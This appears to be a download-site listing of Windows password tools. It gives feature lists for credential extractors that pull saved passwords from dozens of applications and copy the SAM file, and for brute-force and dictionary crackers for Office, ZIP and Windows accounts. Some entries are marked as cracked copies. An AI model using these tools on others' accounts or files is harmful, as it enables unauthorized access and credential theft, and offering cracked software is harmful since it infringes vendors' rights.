Plato Safe Password Manager 11.03.01
Plato Safe Password Manager 11.03.01 | 1.55 MB
Plato Safe Password Manager is an easy-to-use password manager for Windows to store your passwords in a highly encrypted database, and the database consists of only one file, it can be easily transferred from one computer to another. Today you need to remember many passwords. You need a password for the Windows network logon, e-mail account, homepage's FTP password, website member account, etc. How can you remember all those passwords?




Key Features:
• Supports password groups, you can sort your passwords (for example into Windows, Internet, FTP, HomeBack etc.).
• Export the password database to TXT,CSV,XML,HTML formats.
• Import password from CSV file.
• Support with a strong random password generator.
• Consists of only one file, easily transferred from one computer to another.
• Print the password list or preview.

Home page - http://www.giveawayoftheday.com/category/plato-software-inc/CLICK HERE TO DOWNLOADMulti Password Recovery 1.2.0 Multilingual ( + Portable)
Multi Password Recovery 1.2.0 Multilingual (+ Portable) | 3.23 MB
Multi Password Recovery (MPR) - multifunctional password decryption, removal and auditing solution for Windows. MPR instantly finds and recovers passwords from more than 80 popular applications (FTP, E-mail clients, IM, Browsers and so on). It can also delete stored passwords, shows passwords hidden under asterisks, copies SAM file and can generate new passwords. Under W2K/XP/2K3 MPR is able to process blocked for reading files.




FTP clients:
- Windows/Total Commander 4.x, 6.x
- FAR Manager 1.6x, 1.7x
- WS_FTP 5, 6, 7, 8, 9 Home/Pro, 2007
- CuteFTP Home/Pro (mostly all versions)
- FlashFXP 1.x-3.x
- FileZilla 2.x
- FTP Commander Pro/Deluxe (mostly all versions)
- FTP Navigator (mostly all versions)
- BulletProof FTP Client 1.x, 2.x
- SmartFTP 1.x, 2.x
- TurboFTP 5
- FFFTP 1.x
- CoffeeCup FTP 3.x
- Core FTP 2.x
- FTPExplorer 7.x
- Frigate3 FTP 3.x
- UltraFXP 1.x
- FTPRush 1.x
- SecureFX (mostly all versions)

E-mail Clients:
- Outlook Express 6.0
- Outlook 2000 (MSO 2000), 2002 (MSO XP), 2003 (MSO .NET)
- Mozilla Thunderbird 1.0, 1.5.x
- The Bat! v. 1.x, 2.x, 3.x
- Becky 2.x
- Eudora/Eudora Light (mostly all versions)
- Gmail Notifier (mostly all versions)
- Mail.Ru Agent 4.x
- Opera Email Client
- IncrediMail (mostly all versions)
- Group Mail Free (mostly all versions)
- Vypress Auvis 2.x
- PocoMail 3.x, 4.x
- Forte Agent 3.x
- iScribe/nScribe 1.x
- POP Peeper 3.x
- Mail Commander 8.x

Browsers:
- Opera 6.x, 7.x, 8.x, 9.x
- Mozilla Browser 1.7.x
- Internet Explorer 4, 5, 6, 7
- Mozilla Firefox (mostly all versions)

Dialers:
- Windows Remote Access Service (RAS), VPN and Dial-up passwords
- EType Dialer 1.x
- MuxaSoft Dialer 3.0, 4.0, 4.1
- FlexibleSoft Dialer 2.x-4.x
- Advanced Dialer 2.x
- Dialer Queen 1.x
- VDialer 3

Download managers:
- Download Master 4, 5
- GetRight 5
- FlashGet (JetCar) 1.6, 1.71, 1.8
- Internet Download Accelerator 5

Internet
- QIP 2005
- Miranda IM 0.2.x, 0.3.x, 0.4.x, 0.5.x, 0.6
- ICQ 99b-2003b, Lite 4, Lite 5
- MSN Messenger 1.x-7.x
- Windows Messenger
- Yahoo! Messenger 3.x-6.x
- &RQ 0.9
- Trillian 0.x, 2, 3
- AOL Instant Messenger (older versions), 6.x
- AIM Pro
- GAIM 1.x
- Odigo 4
- IM2 (Messenger 2) 1.5.x
- SIM 0.9
- Google Talk (mostly all versions)
- PSI (mostly all versions)
- Faim 0.1
- Windows Live Messenger
- Excite Private Messenger 1.x
- Gizmo Project (mostly all versions)
- Pidgin (mostly all versions)

Other
- Registration key from Win2k & XP
- ClubTimer 2.2-2.7
- Punto Switcher 2.5-2.9
- WinVNC 3.x
- Screen Saver Win9x
- ASP.NET Account
- Remote Desktop Connection
- The Bee 1.x
- FreeCall 3.xCLICK HERE TO DOWNLOAD - mirror 1mirror 2Password Unlocker Bundle 5.5



Password Unlocker Bundle 5.5 | 32 Mb


Password Unlocker Bundle 5.5 is giant lost password recovery software, built in with up to 13 modules! To recover lost passwords for all popular files, archives, and applications, like Windows, Word, Excel, PDF, RAR, SQL, and more..
This password recovery solution contains all our flagship products of password unlocker series, We roll out this product bundle in a purpose to provide an all-in-one password solution for you either in office or at home.

Features:
Password recovery modules in one for Windows, Word, Excel, PDF, RAR, SQL, Instant Messengers, and more...
Recover passwords for Windows, Word, Excel, PPT, PDF, email accounts, network connections, ZIP and RAR archives, and more
Use popular password recovery attacksictionary attack, Brute-force attack, and Brute-force with Mask attack
Supports Windows 7
Recovers various password types fast
Wizard User Interface design, easier to use
Support multiple-core processor to accelerate the password recovery speed
The password recovery process is automatically saved every after a period of time, if stopped, the program will ask you to restart the unfinished task or not




CLICK HERE TO DOWNLOAD







Internet Password Lock v7.0.0







Internet Password Lock v7.0.0 | 6.8MB

Internet Password Lock is a software program for Windows 2000/XP/NT/Vista computers (does not work on Windows 95/98/Me) that allows you to block, control and restrict Internet access. This includes Web browsing and surfing, Instant Messaging, and email. Parents can use Internet Password Lock to protect your children by making sure children do not use the Internet without a parent present. Businesses can use Internet Password Lock to lock out unauthorized Internet use. Once Internet Password Lock is installed, all Internet access will be blocked when Windows starts. To access the Internet, you must view the main Internet Password Lock screen by clicking on the Internet Password Lock icon on the system tray and then input a password (selected by you when you install Internet Password Lock). You can then access the Internet freely until you lock the Internet again using Internet Password Lock.




CLICK HERE TO DOWNLOAD





Word Password Unlocker v4.0 *Patcher-YPOGEiOS*





[MF] Word Password Unlocker v4.0 *Patcher-YPOGEiOS* | 2.7 MB.
Word Password Unlocker is simple utility to recover the Password to Open and remove both Password to Open and Password to Modify of Microsoft Word document. It enables you to get access to the locked Word document, making it possible for you to view and modify the file. The password recovery program supports Word of all versions through 97 to 2007!




Key Features:
Recovers passwords for Microsoft Word of all versions from 97 to 2007
Recovers Password to Open to open the Word file
Removes Password to Open and Password to Modify
Fast in recovering passwords of high strength
Allowed users to customize a password mask if any part of the password is known

Features:
Recovers passwords for Microsoft Word of all versions from 97 to 2007
Recovers Password to Open
Removes both Password to Open and Password to Modify
Fast in recovering passwords of high strength
Brute-force attack for passwords with nothing known on the password
Dictionary attack allowes you to create your own dictionary for the program to base on
Brute-force with mask attack helps to reduce the password search time
Allowed users to customize a password mask if any part of the password is known
Saves the recovery process and resumes if accidentally stopped
Multiple processors, mulitple cores supported
Allowed to set the CPU priority
Automatically shutdown computer after recovery is available
Easy to use

Highlights:
Little program with excellent performance
User-friendly interface
Recovers Password to Open to open the file
Removes "Password to Open" and "Password to Modify"
Good job in recovering b passwords
All settings are covered in an interface
Brut- force attack is available
Available to maximize the recovery time, if with any password information
Works on multiple-processor and multiple-cored CPU computers
Allowed to set CPU priority

Supported Versions:
Microsoft Word 97-2007

System Requirements:
Pentium II 300 or higher CPU
Windows 2000/NT/XP/2003/Vista/Windows 7
64 MB of RAM

File Size: 2.68 MB.
Language: English
OS: Windows 2000/NT/XP/2003/Vista/Windows 7CLICK HERE TO DOWNLOADPassword Recovery Magic 6.1.1.115 (+Portable)




ZIP Password Recovery Magic - the latest build a successful and easy to use utility that will help restore the necessary passwords for ZIP archives. Application can perform brute force of numbers, letters and symbols. When the password is unknown word you can use a dictionary attack. The program has a convenient and intuitive user interface.

Key features:
• Recover passwords of ZIP archives
• Selection of a password dictionary
• Select a range selection of the password (letters, numbers, symbols)
• Large set of words in the dictionary
• Working in the background
• Easy to use and user-friendly interface

Name: ZIP Password Recovery Magic
Version: 6.1.1.115 (+ Portable)
Author: Password Recovery Magic Studio Ltd
Of.sayt: password-recovery-magic.com
Updated: 2010.02
Price: $ 19.99 (the medicine in the archive)
Interface: EN
OC: Windows 98/2K/XP/2K3/Vista/7
Size: 5.1 MB
Format:. Rar
Archive is divided into: one file
Information for restoration: 3%

CLICK HERE TO DOWNLOAD




















Reset Windows Password 1.1.0.148 Lite Edition







Reset Windows Password 1.1.0.148 Lite Edition | 126MBBu program ile windows işletim sisteminde kullandığınız yerel yönetici yani administratör şifresi veya kullanıcı şifrelerini sıfırlayabilirsiniz.Program isteğe göre ev kullanıcıları ve işletmeler için bir şifre kurtarma CD si veya USB Flash belleğinize şifreyi sıfırlamak için gerekli dosyaları oluşturur. Bu şimdiye kadar windows şifresini kaldırmak için en popüler ve güvenli bir çözümdür.Programı kullanmak için herhangi bir teknisyene veya bilgisayarı biçimlendirmeye gerek yoktur.Reset Windows Password - the best professional program to reset, change or recover passwords for all types of user accounts Windows. Utility supports all versions of Windows, working with local and domain accounts, almost instantly recovers passwords for the accounts, moreover.

Reset Windows Password is required when they lose an administrator password, if forgotten password to log on Windows, it is not possible to activate your account. Theprogram is loaded from a bootable CD or USB drive. The application interface is made in the form of the wizard. Therefore, the process of operation does not seem difficult, even inexperienced users.

Unlike other similar utilities, Reset Windows Password - the only program that works correctly with all types of user accounts Windows.





Features Reset Windows Password:
- Simple, intuitive graphical interface.
- Reset and change passwords of local users and administrators, administrators of the domain user accounts, account DSRM.
- Activation and unlock user accounts.
- Disables password expiration.
- Advanced algorithms for finding the password.
- Support for all versions of Windows, including Windows 7.
- Supports Windows (X64).
- Boot from a bootable CD or USB drive.
- A large collection of IDE, SATA, SCSI, RAID drivers.
- Detects multiple operating systems installed on your computer.
- Allows you to undo changes made to the system.
- Removes passwords and other sensitive data from your computer.